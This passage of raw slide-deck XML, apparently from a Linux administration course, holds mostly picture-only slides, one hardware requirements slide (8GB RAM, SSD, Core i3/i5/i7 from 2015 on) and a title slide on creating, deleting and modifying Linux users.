          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3821" name="Google Shape;3821;p614"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="4870" l="0" r="1497" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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5" name="Shape 3825"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3826" name="Google Shape;3826;p615"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="4095" l="1591" r="761" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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0" name="Shape 3830"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3831" name="Google Shape;3831;p616"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="3716" l="0" r="1497" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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5" name="Shape 3835"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3836" name="Google Shape;3836;p617"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="3521" l="0" r="2248" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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0" name="Shape 3840"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3841" name="Google Shape;3841;p618"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="3633" l="0" r="2315" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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5" name="Shape 3845"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3846" name="Google Shape;3846;p619"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="4021" l="0" r="3175" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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0" name="Shape 3850"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3851" name="Google Shape;3851;p620"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="5168" l="0" r="3929" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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5" name="Shape 3855"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3856" name="Google Shape;3856;p621"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="3250" l="0" r="2200" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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0" name="Shape 3860"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3861" name="Google Shape;3861;p622"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="11922" l="19844" r="20811" t="16083"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1429675" y="294450"/>
            <a:ext cx="6770602" cy="4620299"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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5" name="Shape 3865"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3866" name="Google Shape;3866;p623"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="3734" l="14043" r="16293" t="11969"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="907300" y="0"/>
            <a:ext cx="7556218"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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="5159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5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>H/W </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>System Requirements</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="Google Shape;132;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1308575"/>
            <a:ext cx="8520600" cy="33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solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RAM 8GB (Min)</a:t>
            </a:r>
            <a:endParaRPr sz="3300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SSD (512GB) (Yes)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Primary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> OS)</a:t>
            </a:r>
            <a:endParaRPr sz="3300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HDD (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)(Backup)</a:t>
            </a:r>
            <a:endParaRPr sz="3300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Core I3/i5/i7  -  5th/ 6th/7th Above</a:t>
            </a:r>
            <a:endParaRPr sz="3300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CPU launch Year 2015+</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3300">
              <a:solidFill>
                <a:srgbClr val="6AA84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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="633875"/>
            <a:ext cx="8520600" cy="3094500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="5600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>How to </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="5600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="5600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>create, delete, and modify </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="5600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>users in Linux</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="6100">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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pic>
        <p:nvPicPr>
          <p:cNvPr id="3871" name="Google Shape;3871;p624"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="3917" l="17372" r="18664" t="12372"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187400" y="0"/>
            <a:ext cx="6822024" cy="5021949"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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5" name="Shape 3875"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3876" name="Google Shape;3876;p625"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="5830" l="17484" r="18659" t="8169"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1182925" y="39050"/>
            <a:ext cx="6737827" cy="5104450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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0" name="Shape 3880"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3881" name="Google Shape;3881;p626"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="17297" l="10388" r="39835" t="23075"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1046000" y="331475"/>
            <a:ext cx="6648998" cy="4480550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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5" name="Shape 3885"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3886" name="Google Shape;3886;p627"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="17486" l="10497" r="39084" t="22503"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="713050" y="233225"/>
            <a:ext cx="6870974" cy="4600201"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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0" name="Shape 3890"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3891" name="Google Shape;3891;p628"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="21498" l="10928" r="39190" t="23078"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="731600" y="271425"/>
            <a:ext cx="7361050" cy="4600649"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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5" name="Shape 3895"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3896" name="Google Shape;3896;p629"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="18443" l="10818" r="38977" t="23264"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="703850" y="343298"/>
            <a:ext cx="6353102" cy="4149225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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0" name="Shape 3900"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3901" name="Google Shape;3901;p630"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="21498" l="10600" r="39087" t="22312"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="676100" y="390450"/>
            <a:ext cx="7407298" cy="4653350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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5" name="Shape 3905"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3906" name="Google Shape;3906;p631"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="4946" l="17760" r="18832" t="9179"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330750" y="0"/>
            <a:ext cx="6752002" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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0" name="Shape 3910"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3911" name="Google Shape;3911;p632"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="3535" l="17694" r="18124" t="8745"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
